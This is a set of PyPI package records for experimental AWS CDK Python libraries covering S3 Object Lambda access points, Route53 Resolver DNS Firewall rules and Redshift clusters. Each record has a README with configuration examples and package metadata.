aws-cdk.aws-s3objectlambda-alpha
2.239.0a0
The CDK Construct Library for AWS::S3ObjectLambda
# AWS::S3ObjectLambda Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This construct library allows you to define S3 object lambda access points. ```python import aws_cdk.aws_lambda as lambda_ import aws_cdk.aws_s3 as s3 import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda import aws_cdk as cdk stack = cdk.Stack() bucket = s3.Bucket(stack, "MyBucket") handler = lambda_.Function(stack, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset("lambda.zip") ) s3objectlambda.AccessPoint(stack, "MyObjectLambda", bucket=bucket, handler=handler, access_point_name="my-access-point", payload={ "prop": "value" } ) ``` ## Handling range and part number requests Lambdas are currently limited to only transforming `GetObject` requests. 
However, they can additionally support `GetObject-Range` and `GetObject-PartNumber` requests, which need to be specified in the access point configuration: ```python import aws_cdk.aws_lambda as lambda_ import aws_cdk.aws_s3 as s3 import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda import aws_cdk as cdk stack = cdk.Stack() bucket = s3.Bucket(stack, "MyBucket") handler = lambda_.Function(stack, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset("lambda.zip") ) s3objectlambda.AccessPoint(stack, "MyObjectLambda", bucket=bucket, handler=handler, access_point_name="my-access-point", supports_get_object_range=True, supports_get_object_part_number=True ) ``` ## Pass additional data to Lambda function You can specify an additional object that provides supplemental data to the Lambda function used to transform objects. The data is delivered as a JSON payload to the Lambda: ```python import aws_cdk.aws_lambda as lambda_ import aws_cdk.aws_s3 as s3 import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda import aws_cdk as cdk stack = cdk.Stack() bucket = s3.Bucket(stack, "MyBucket") handler = lambda_.Function(stack, "MyFunction", runtime=lambda_.Runtime.NODEJS_LATEST, handler="index.handler", code=lambda_.Code.from_asset("lambda.zip") ) s3objectlambda.AccessPoint(stack, "MyObjectLambda", bucket=bucket, handler=handler, access_point_name="my-access-point", payload={ "prop": "value" } ) ``` ## Accessing the S3 AccessPoint ARN If you need access to the S3 access point, you can get its ARN like so: ```python import aws_cdk.aws_s3objectlambda_alpha as s3objectlambda # access_point: s3objectlambda.AccessPoint s3_access_point_arn = access_point.s3_access_point_arn ``` This is only supported for AccessPoints created in the stack - currently you're unable to get the S3 AccessPoint ARN for imported AccessPoints. To do that you'd have to know the S3 bucket name beforehand.
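The examples above wire up the access point but do not show the transforming Lambda itself. As a minimal sketch (the uppercase transform and handler shape are illustrative), a `GetObject`-transforming handler fetches the original object through the presigned URL in the event and returns the result via S3's `WriteGetObjectResponse` API:

```python
import urllib.request


def transform(body: bytes) -> bytes:
    """Illustrative transformation: uppercase the object's contents."""
    return body.upper()


def handler(event, context):
    """Sketch of an S3 Object Lambda handler for GetObject requests."""
    import boto3  # provided by the Lambda runtime

    ctx = event["getObjectContext"]
    # Fetch the original, untransformed object via the presigned URL
    # that S3 Object Lambda includes in the event.
    with urllib.request.urlopen(ctx["inputS3Url"]) as resp:
        original = resp.read()

    # Return the transformed bytes to the caller.
    boto3.client("s3").write_get_object_response(
        RequestRoute=ctx["outputRoute"],
        RequestToken=ctx["outputToken"],
        Body=transform(original),
    )
    return {"statusCode": 200}
```

Any `payload` configured on the access point arrives in the same event, alongside `getObjectContext`, so the handler can vary its behavior per access point.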
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:18.466474
aws_cdk_aws_s3objectlambda_alpha-2.239.0a0.tar.gz
54,541
82/62/4838acf80480d1a9410836c66cdea4743c134cbe700470b0f223288553a6/aws_cdk_aws_s3objectlambda_alpha-2.239.0a0.tar.gz
source
sdist
null
false
5aca3a468ab0aa3b1b7bea7b998da054
843beb235b984ad58049227d981de8731de7a5d45cf713a62361bddfece4584f
82624838acf80480d1a9410836c66cdea4743c134cbe700470b0f223288553a6
null
[]
0
2.1
aws-cdk.aws-route53resolver-alpha
2.239.0a0
The CDK Construct Library for AWS::Route53Resolver
# Amazon Route53 Resolver Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> ## DNS Firewall With Route 53 Resolver DNS Firewall, you can filter and regulate outbound DNS traffic for your virtual private clouds (VPCs). To do this, you create reusable collections of filtering rules in DNS Firewall rule groups and associate the rule groups to your VPC. DNS Firewall provides protection for outbound DNS requests from your VPCs. These requests route through Resolver for domain name resolution. A primary use of DNS Firewall protections is to help prevent DNS exfiltration of your data. DNS exfiltration can happen when a bad actor compromises an application instance in your VPC and then uses DNS lookup to send data out of the VPC to a domain that they control. With DNS Firewall, you can monitor and control the domains that your applications can query. You can deny access to the domains that you know to be bad and allow all other queries to pass through. Alternately, you can deny access to all domains except for the ones that you explicitly trust.
### Domain lists Domain lists can be created using a list of strings, a text file stored in Amazon S3 or a local text file: ```python block_list = route53resolver.FirewallDomainList(self, "BlockList", domains=route53resolver.FirewallDomains.from_list(["bad-domain.com", "bot-domain.net"]) ) s3_list = route53resolver.FirewallDomainList(self, "S3List", domains=route53resolver.FirewallDomains.from_s3_url("s3://bucket/prefix/object") ) asset_list = route53resolver.FirewallDomainList(self, "AssetList", domains=route53resolver.FirewallDomains.from_asset("/path/to/domains.txt") ) ``` The file must be a text file and must contain a single domain per line. Use `FirewallDomainList.fromFirewallDomainListId()` to import an existing or [AWS managed domain list](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver-dns-firewall-managed-domain-lists.html): ```python # AWSManagedDomainsMalwareDomainList in us-east-1 malware_list = route53resolver.FirewallDomainList.from_firewall_domain_list_id(self, "Malware", "rslvr-fdl-2c46f2ecbfec4dcc") ``` ### Rule group Create a rule group: ```python # my_block_list: route53resolver.FirewallDomainList route53resolver.FirewallRuleGroup(self, "RuleGroup", rules=[route53resolver.FirewallRule( priority=10, firewall_domain_list=my_block_list, # block and reply with NODATA action=route53resolver.FirewallRuleAction.block() ) ] ) ``` Rules can be added at construction time or using `addRule()`: ```python # my_block_list: route53resolver.FirewallDomainList # rule_group: route53resolver.FirewallRuleGroup rule_group.add_rule( priority=10, firewall_domain_list=my_block_list, # block and reply with NXDOMAIN action=route53resolver.FirewallRuleAction.block(route53resolver.DnsBlockResponse.nx_domain()) ) rule_group.add_rule( priority=20, firewall_domain_list=my_block_list, # block and override DNS response with a custom domain action=route53resolver.FirewallRuleAction.block(route53resolver.DnsBlockResponse.override("amazon.com")) ) ``` Use 
`associate()` to associate a rule group with a VPC: ```python import aws_cdk.aws_ec2 as ec2 # rule_group: route53resolver.FirewallRuleGroup # my_vpc: ec2.Vpc rule_group.associate("Association", priority=101, vpc=my_vpc ) ```
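Conceptually, Resolver evaluates a rule group's rules in priority order (lowest number first) and applies the first rule whose domain list contains the queried domain; a `block()` rule then answers with its configured response (NODATA by default, or NXDOMAIN/OVERRIDE). A simplified, hypothetical model of that evaluation in plain Python (not the CDK or Resolver API):

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Rule:
    priority: int
    domains: set                     # the rule's firewall domain list
    action: str                      # "ALLOW", "ALERT", or "BLOCK"
    block_response: str = "NODATA"   # NODATA, NXDOMAIN, or OVERRIDE


def evaluate(rules, query: str) -> Optional[str]:
    """Return the response of the first matching rule, lowest priority first."""
    for rule in sorted(rules, key=lambda r: r.priority):
        if query in rule.domains:
            if rule.action == "BLOCK":
                return rule.block_response
            return rule.action
    return None  # no rule matched: the query passes through


rules = [
    Rule(priority=10, domains={"bad-domain.com"}, action="BLOCK",
         block_response="NXDOMAIN"),
    Rule(priority=20, domains={"bot-domain.net"}, action="BLOCK"),
]
```

For example, `evaluate(rules, "bad-domain.com")` returns `"NXDOMAIN"`, while a query for an unlisted domain returns `None` and is resolved normally.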
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:17.788138
aws_cdk_aws_route53resolver_alpha-2.239.0a0.tar.gz
76,828
43/42/625092a18f5607ae61793da24b6044471a8d63501306386a5007ba534597/aws_cdk_aws_route53resolver_alpha-2.239.0a0.tar.gz
source
sdist
null
false
cadf56c50d0ccdc636e8d33b42409477
628c2a5b207a1dc4c4342f64bc117aca700b9a2fad48a1efeb6c5293cfa4320f
4342625092a18f5607ae61793da24b6044471a8d63501306386a5007ba534597
null
[]
0
2.1
aws-cdk.aws-redshift-alpha
2.239.0a0
The CDK Construct Library for AWS::Redshift
# Amazon Redshift Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> ## Starting a Redshift Cluster Database To set up a Redshift cluster, define a `Cluster`. It will be launched in a VPC. You can specify a VPC, otherwise one will be created. The nodes are always launched in private subnets and are encrypted by default. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 vpc = ec2.Vpc(self, "Vpc") cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc ) ``` By default, the master password will be generated and stored in AWS Secrets Manager. You can specify characters to not include in generated passwords by setting `excludeCharacters` property. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 vpc = ec2.Vpc(self, "Vpc") cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin", exclude_characters="\"@/\\ '`" ), vpc=vpc ) ``` A default database named `default_db` will be created in the cluster. To change the name of this database set the `defaultDatabaseName` attribute in the constructor properties. By default, the cluster will not be publicly accessible. Depending on your use case, you can make the cluster publicly accessible with the `publiclyAccessible` property. By default, the node type is `RA3_LARGE`. 
You can specify a different node type by setting the `nodeType` property. ```python # Example automatically generated from non-compiling source. May contain errors. from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 # vpc: ec2.IVpc cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, node_type=NodeType.RA3_XLPLUS ) ``` ## Adding a logging bucket for database audit logging to S3 Amazon Redshift logs information about connections and user activities in your database. These logs help you to monitor the database for security and troubleshooting purposes, a process called database auditing. To send these logs to an S3 bucket, specify the `loggingProperties` when creating a new cluster. ```python from aws_cdk.aws_redshift_alpha import Login, LoggingProperties import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_s3 as s3 vpc = ec2.Vpc(self, "Vpc") bucket = s3.Bucket.from_bucket_name(self, "bucket", "amzn-s3-demo-bucket") cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, logging_properties=LoggingProperties( logging_bucket=bucket, logging_key_prefix="prefix" ) ) ``` ## Availability Zone Relocation By using [relocation in Amazon Redshift](https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-recovery.html), you allow Amazon Redshift to move a cluster to another Availability Zone (AZ) without any loss of data or changes to your applications. This feature can be applied to both new and existing clusters. To enable this feature, set the `availabilityZoneRelocation` property to `true`. ```python # Example automatically generated from non-compiling source. May contain errors. 
from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 # vpc: ec2.IVpc cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, node_type=NodeType.RA3_XLPLUS, availability_zone_relocation=True ) ``` **Note**: The `availabilityZoneRelocation` property is only available for RA3 node types. ## Connecting To control who can access the cluster, use the `.connections` attribute. Redshift Clusters have a default port, so you don't need to specify the port: ```python cluster.connections.allow_default_port_from_any_ipv4("Open to the world") ``` The endpoint to access your database cluster will be available as the `.clusterEndpoint` attribute: ```python cluster.cluster_endpoint.socket_address ``` ## Database Resources This module allows for the creation of non-CloudFormation database resources such as users and tables. This allows you to manage identities, permissions, and stateful resources within your Redshift cluster from your CDK application. Because these resources are not available in CloudFormation, this library leverages [custom resources](https://docs.aws.amazon.com/cdk/api/latest/docs/custom-resources-readme.html) to manage them. In addition to the IAM permissions required to make Redshift service calls, the execution role for the custom resource handler requires database credentials to create resources within the cluster. These database credentials can be supplied explicitly through the `adminUser` properties of the various database resource constructs. Alternatively, the credentials can be automatically pulled from the Redshift cluster's default administrator credentials. 
However, this option is only available if the password for the credentials was generated by the CDK application (i.e., no value was provided for [the `masterPassword` property](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-redshift.Login.html#masterpasswordspan-classapi-icon-api-icon-experimental-titlethis-api-element-is-experimental-it-may-change-without-noticespan) of [`Cluster.masterUser`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-redshift.Cluster.html#masteruserspan-classapi-icon-api-icon-experimental-titlethis-api-element-is-experimental-it-may-change-without-noticespan)). ### Creating Users Create a user within a Redshift cluster database by instantiating a `User` construct. This will generate a username and password, store the credentials in an [AWS Secrets Manager `Secret`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-secretsmanager.Secret.html), and make a query to the Redshift cluster to create a new database user with the credentials. ```python User(self, "User", cluster=cluster, database_name="databaseName" ) ``` By default, the user credentials are encrypted with your AWS account's default Secrets Manager encryption key. You can specify the encryption key used for this purpose by supplying a key in the `encryptionKey` property. ```python import aws_cdk.aws_kms as kms encryption_key = kms.Key(self, "Key") User(self, "User", encryption_key=encryption_key, cluster=cluster, database_name="databaseName" ) ``` By default, a username is automatically generated from the user construct ID and its path in the construct tree. You can specify a particular username by providing a value for the `username` property. Usernames must be valid identifiers; see: [Names and identifiers](https://docs.aws.amazon.com/redshift/latest/dg/r_names.html) in the *Amazon Redshift Database Developer Guide*.
```python User(self, "User", username="myuser", cluster=cluster, database_name="databaseName" ) ``` The user password is generated by AWS Secrets Manager using the default configuration found in [`secretsmanager.SecretStringGenerator`](https://docs.aws.amazon.com/cdk/api/latest/docs/@aws-cdk_aws-secretsmanager.SecretStringGenerator.html), except with password length `30` and some SQL-incompliant characters excluded. The plaintext for the password will never be present in the CDK application; instead, a [CloudFormation Dynamic Reference](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/dynamic-references.html) will be used wherever the password value is required. You can specify characters to not include in generated passwords by setting the `excludeCharacters` property. ```python User(self, "User", cluster=cluster, database_name="databaseName", exclude_characters="\"@/\\ '`" ) ``` ### Creating Tables Create a table within a Redshift cluster database by instantiating a `Table` construct. This will make a query to the Redshift cluster to create a new database table with the supplied schema. ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) ``` In versions later than v2.114.1, a table's name can be changed; for versions <= v2.114.1 this was not possible, so renaming tables is disabled in those versions. ```python # Example automatically generated from non-compiling source. May contain errors.
from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_name="oldTableName", # This value can be change for versions greater than v2.114.1 table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) ``` The table can be configured to have distStyle attribute and a distKey column: ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", dist_key=True), Column(name="col2", data_type="float") ], cluster=cluster, database_name="databaseName", dist_style=TableDistStyle.KEY ) ``` The table can also be configured to have sortStyle attribute and sortKey columns: ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", sort_key=True), Column(name="col2", data_type="float", sort_key=True) ], cluster=cluster, database_name="databaseName", sort_style=TableSortStyle.COMPOUND ) ``` Tables and their respective columns can be configured to contain comments: ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", comment="This is a column comment"), Column(name="col2", data_type="float", comment="This is a another column comment") ], cluster=cluster, database_name="databaseName", table_comment="This is a table comment" ) ``` Table columns can be configured to use a specific compression encoding: ```python from aws_cdk.aws_redshift_alpha import Column, Column from aws_cdk.aws_redshift_alpha import ColumnEncoding Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)", encoding=ColumnEncoding.TEXT32K), Column(name="col2", data_type="float", encoding=ColumnEncoding.DELTA32K) ], cluster=cluster, database_name="databaseName" ) ``` Table columns can also contain an `id` attribute, which can allow 
table columns to be renamed. **NOTE** To use the `id` attribute, you must also enable the `@aws-cdk/aws-redshift:columnId` feature flag. ```python from aws_cdk.aws_redshift_alpha import Column, Column Table(self, "Table", table_columns=[Column(id="col1", name="col1", data_type="varchar(4)"), Column(id="col2", name="col2", data_type="float") ], cluster=cluster, database_name="databaseName" ) ``` Query execution duration is limited to 1 minute by default. You can change this by setting the `timeout` property. Valid timeout values are between 1 second and 15 minutes. ```python from aws_cdk.aws_redshift_alpha import Column, Column from aws_cdk import Duration Table(self, "Table", table_columns=[Column(id="col1", name="col1", data_type="varchar(4)"), Column(id="col2", name="col2", data_type="float") ], cluster=cluster, database_name="databaseName", timeout=Duration.minutes(15) ) ``` ### Granting Privileges You can give a user privileges to perform certain actions on a table by using the `Table.grant()` method. ```python from aws_cdk.aws_redshift_alpha import Column, Column user = User(self, "User", cluster=cluster, database_name="databaseName" ) table = Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) table.grant(user, TableAction.DROP, TableAction.SELECT) ``` Take care when managing privileges via the CDK, as attempting to manage a user's privileges on the same table in multiple CDK applications could lead to accidentally overriding these permissions. Consider the following two CDK applications which both refer to the same user and table.
In application 1, the resources are created and the user is given `INSERT` permissions on the table: ```python from aws_cdk.aws_redshift_alpha import Column, Column database_name = "databaseName" username = "myuser" table_name = "mytable" user = User(self, "User", username=username, cluster=cluster, database_name=database_name ) table = Table(self, "Table", table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name=database_name ) table.grant(user, TableAction.INSERT) ``` In application 2, the resources are imported and the user is given `INSERT` permissions on the table: ```python from aws_cdk.aws_redshift_alpha import Column, Column database_name = "databaseName" username = "myuser" table_name = "mytable" user = User.from_user_attributes(self, "User", username=username, password=SecretValue.unsafe_plain_text("NOT_FOR_PRODUCTION"), cluster=cluster, database_name=database_name ) table = Table.from_table_attributes(self, "Table", table_name=table_name, table_columns=[Column(name="col1", data_type="varchar(4)"), Column(name="col2", data_type="float")], cluster=cluster, database_name="databaseName" ) table.grant(user, TableAction.INSERT) ``` Both applications attempt to grant the user the appropriate privilege on the table by submitting a `GRANT USER` SQL query to the Redshift cluster. Note that the latter of these two calls will have no effect since the user has already been granted the privilege. Now, if application 1 were to remove the call to `grant`, a `REVOKE USER` SQL query is submitted to the Redshift cluster. In general, application 1 does not know that application 2 has also granted this permission and thus cannot decide not to issue the revocation. This leads to the undesirable state where application 2 still contains the call to `grant` but the user does not have the specified permission. 
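The conflicting-grant scenario above can be modeled with a shared privilege set: each application computes its GRANT/REVOKE delta only against what it granted on its own previous deployment, so one application's revocation silently undoes another's grant. A hypothetical sketch (plain Python, not the custom resource handler's actual logic):

```python
# Shared state: the privileges actually held by the user in the cluster.
cluster_privileges: set = set()


def deploy(app_grants: set, previously_granted: set) -> None:
    """Sketch of how each CDK app applies its grant/revoke delta.

    Each app only compares against what *it* granted last deployment,
    so a revoke can remove a privilege another app still relies on.
    """
    for action in app_grants - previously_granted:
        cluster_privileges.add(action)        # GRANT
    for action in previously_granted - app_grants:
        cluster_privileges.discard(action)    # REVOKE


# App 1 and app 2 both grant INSERT on the same table.
deploy({"INSERT"}, previously_granted=set())   # app 1
deploy({"INSERT"}, previously_granted=set())   # app 2 (no-op grant)

# App 1 later removes its grant() call and redeploys:
deploy(set(), previously_granted={"INSERT"})   # app 1 revokes
# App 2 still declares the grant, but the privilege is now gone.
```

The final state is an empty privilege set even though application 2 still contains its `grant` call, which is exactly the undesirable outcome described above.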
Note that this does not occur when duplicate privileges are granted within the same application, as such privileges are de-duplicated before any SQL query is submitted. ## Rotating credentials When the master password is generated and stored in AWS Secrets Manager, it can be rotated automatically: ```python cluster.add_rotation_single_user() ``` The multi user rotation scheme is also available: ```python user = User(self, "User", cluster=cluster, database_name="databaseName" ) cluster.add_rotation_multi_user("MultiUserRotation", secret=user.secret ) ``` ## Adding Parameters You can add a parameter to a parameter group with `ClusterParameterGroup.addParameter()`. ```python from aws_cdk.aws_redshift_alpha import ClusterParameterGroup params = ClusterParameterGroup(self, "Params", description="desc", parameters={ "require_ssl": "true" } ) params.add_parameter("enable_user_activity_logging", "true") ``` Additionally, you can add a parameter to the cluster's associated parameter group with `Cluster.addToParameterGroup()`. If the cluster does not have an associated parameter group, a new parameter group is created. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc cluster = Cluster(self, "Cluster", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc ) cluster.add_to_parameter_group("enable_user_activity_logging", "true") ``` ## Rebooting for Parameter Updates In most cases, existing clusters [must be manually rebooted](https://docs.aws.amazon.com/redshift/latest/mgmt/working-with-parameter-groups.html) to apply parameter changes. You can automate parameter-related reboots by setting the cluster's `rebootForParameterChanges` property to `true`, or by using `Cluster.enableRebootForParameterChanges()`.
```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc cluster = Cluster(self, "Cluster", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc ) cluster.add_to_parameter_group("enable_user_activity_logging", "true") cluster.enable_reboot_for_parameter_changes() ``` ## Resource Action You can perform various actions on the Redshift resource by specifying the `resourceAction` property, including [pausing and resuming the cluster](https://docs.aws.amazon.com/redshift/latest/mgmt/rs-mgmt-pause-resume-cluster.html), as well as initiating [failover for Multi-AZ clusters](https://docs.aws.amazon.com/redshift/latest/mgmt/test-cluster-multi-az.html). ```python # Example automatically generated from non-compiling source. May contain errors. from aws_cdk.aws_redshift_alpha import Login, Login, Login import aws_cdk.aws_ec2 as ec2 from aws_cdk.aws_redshift_alpha import ResourceAction # vpc: ec2.IVpc # Pause the cluster Cluster(self, "PausedCluster", master_user=Login( master_username="admin" ), vpc=vpc, resource_action=ResourceAction.PAUSE ) # Resume the cluster Cluster(self, "ResumedCluster", master_user=Login( master_username="admin" ), vpc=vpc, resource_action=ResourceAction.RESUME ) # Failover the cluster Cluster(self, "FailOverCluster", master_user=Login( master_username="admin" ), # VPC must have 3 AZs for the cluster which executes failover action vpc=vpc, # Must be a multi-AZ cluster to failover multi_az=True, resource_action=ResourceAction.FAILOVER_PRIMARY_COMPUTE ) ``` ## Elastic IP If you configure your cluster to be publicly accessible, you can optionally select an *elastic IP address* to use for the external IP address. An elastic IP address is a static IP address that is associated with your AWS account. You can use an elastic IP address to connect to your cluster from outside the VPC. 
An elastic IP address gives you the ability to change your underlying configuration without affecting the IP address that clients use to connect to your cluster. This approach can be helpful for situations such as recovery after a failure. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc Cluster(self, "Redshift", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc, publicly_accessible=True, elastic_ip="10.123.123.255" ) ``` If the Cluster is in a VPC and you want to connect to it using the private IP address from within the VPC, it is important to enable *DNS resolution* and *DNS hostnames* in the VPC config. If these parameters are not set, connections from within the VPC connect to the elastic IP address and not the private IP address. ```python import aws_cdk.aws_ec2 as ec2 vpc = ec2.Vpc(self, "VPC", enable_dns_support=True, enable_dns_hostnames=True ) ``` Note that if there is already an existing, publicly accessible Cluster whose VPC configuration is changed to use *DNS hostnames* and *DNS resolution*, connections still use the elastic IP address until the cluster is resized. ### Elastic IP vs. Cluster node public IP The elastic IP address is an external IP address for accessing the cluster outside of a VPC. It's not related to the cluster node public IP addresses and private IP addresses that are accessible via the `clusterEndpoint` property. The public and private cluster node IP addresses appear regardless of whether the cluster is publicly accessible or not. They are used only in certain circumstances to configure ingress rules on the remote host. These circumstances occur when you load data from an Amazon EC2 instance or other remote host using a Secure Shell (SSH) connection.
### Attach Elastic IP after Cluster creation In some cases, you might want to associate the cluster with an elastic IP address or change an elastic IP address that is associated with the cluster. To attach an elastic IP address after the cluster is created, first update the cluster so that it is not publicly accessible, then make it both publicly accessible and add an Elastic IP address in the same operation. ## Enhanced VPC Routing When you use Amazon Redshift enhanced VPC routing, Amazon Redshift forces all COPY and UNLOAD traffic between your cluster and your data repositories through your virtual private cloud (VPC) based on the Amazon VPC service. By using enhanced VPC routing, you can use standard VPC features, such as VPC security groups, network access control lists (ACLs), VPC endpoints, VPC endpoint policies, internet gateways, and Domain Name System (DNS) servers, as described in the Amazon VPC User Guide. You use these features to tightly manage the flow of data between your Amazon Redshift cluster and other resources. When you use enhanced VPC routing to route traffic through your VPC, you can also use VPC flow logs to monitor COPY and UNLOAD traffic. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk as cdk # vpc: ec2.Vpc Cluster(self, "Redshift", master_user=Login( master_username="admin", master_password=cdk.SecretValue.unsafe_plain_text("tooshort") ), vpc=vpc, enhanced_vpc_routing=True ) ``` If enhanced VPC routing is not enabled, Amazon Redshift routes traffic through the internet, including traffic to other services within the AWS network. ## Default IAM role Some Amazon Redshift features require Amazon Redshift to access other AWS services on your behalf. For your Amazon Redshift clusters to act on your behalf, you supply security credentials to your clusters. The preferred method to supply security credentials is to specify an AWS Identity and Access Management (IAM) role. 
When you create an IAM role and set it as the default for the cluster using the console, you don't have to provide the IAM role's Amazon Resource Name (ARN) to perform authentication and authorization. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc default_role = iam.Role(self, "DefaultRole", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, roles=[default_role], default_role=default_role ) ``` A default role can also be added to a cluster using the `addDefaultIamRole` method. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc default_role = iam.Role(self, "DefaultRole", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) redshift_cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, roles=[default_role] ) redshift_cluster.add_default_iam_role(default_role) ``` ## IAM roles Attaching IAM roles to a Redshift Cluster grants permissions to the Redshift service to perform actions on your behalf. ```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc role = iam.Role(self, "Role", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc, roles=[role] ) ``` Additional IAM roles can be attached to a cluster using the `addIamRole` method.
